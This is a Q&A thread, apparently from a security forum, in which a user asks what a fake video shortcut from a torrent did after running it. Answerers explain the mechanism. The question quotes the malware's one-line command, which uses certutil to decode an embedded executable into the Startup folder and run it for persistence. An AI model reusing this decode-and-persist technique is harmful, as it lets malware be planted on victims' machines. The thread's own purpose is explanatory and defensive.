0

I downloaded a torrent which turned out to be a shortcut that did the following thing.

%ComSpec% /c certutil -decode "Succession.S02E07.720p.WEB.x265-MiNX.mkv.lnk" 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe" >nul 2>&1 && 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe"

Does anyone have any idea what this file did? I accidentally ran it.

The file was 222MB large. I checked my startup folder but there seems to be nothing there, maybe because I pressed cancel when the cmd window popped up. But the file went from 222MB to 1.85 kb after I ran it.

The link to the file is a torrent here https://thepiratebay.org/torrent/34688106/Succession.S02E07.720p.WEB.x265-MiNX

Downloading it won't do anything but running it will. I also ran avast scan and windows defender scan on the file but it found nothing.

I re-downloaded the file and renamed the .lnk to .txt, it looks like a security certificate.

schroeder
  • 123,438
  • 55
  • 284
  • 319
anarchy
  • 103
  • 2

1 Answers1

2

certutil is a built-in program in Windows used to manage certificates. The above command would be decoding the certificate present in the file and install malware. An article illustrating how this could be used.

Rohith K D
  • 1,029
  • 1
  • 7
  • 12
  • do you know how i can find it and remove it? could it be ransomware? – anarchy Sep 23 '19 at 05:51
  • COMSPEC points to cmd. It then decodes the file using certutil and create a.exe file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup with your username as the .exe filename and executes it. – Rohith K D Sep 23 '19 at 06:14
  • So if the file is not in the startup folder I should be fine? – anarchy Sep 23 '19 at 06:14
  • Does it execute at the time of creation? Or during startup? – anarchy Sep 23 '19 at 06:16
  • Once the file is decoded successfully, the .exe would be executed. As long as the .exe is present in startup folder it will be executed on every startup. – Rohith K D Sep 23 '19 at 06:34